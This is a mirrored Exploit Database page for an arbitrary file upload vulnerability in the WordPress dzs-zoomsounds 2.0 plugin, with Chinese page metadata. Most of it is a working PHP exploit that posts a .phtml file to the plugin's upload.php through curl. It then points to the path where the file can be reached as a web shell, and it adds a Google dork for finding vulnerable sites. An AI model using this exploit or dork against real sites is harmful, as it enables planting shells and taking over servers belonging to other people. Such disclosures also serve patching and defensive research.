WordPress Plugin dzs-zoomsounds 2.0 – Arbitrary File Upload

• Exploit Database
• 107 阅读

• 作者： nabil chris
  日期： 2015-06-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37166/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25

  ################################################################################################### # Exploit Title: WordPress dzs-zoomsounds Plugins Remote File Upload Vulnerability # Vendor : http://digitalzoomstudio.net/docs/wpzoomsounds/ # Author: bl4ck-dz # Date: 28/05/2015 # Infected File: upload.php # Category: webapps # Google dork:inurl:/wp-content/plugins/dzs-zoomsounds/ # Tested on : Linux | Windows ################################################################################################### <?php $evil="dz.phtml"; $ch = curl_init("http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array(&apos;file_field&apos;=>"@$evil")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); echo "$postResult"; ?> Shell Access : http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload/$Evil   # GreeTz : Akram Stelle ~ Mr DZ ~ All DzTeaM Members & all all Dz H4x0rs !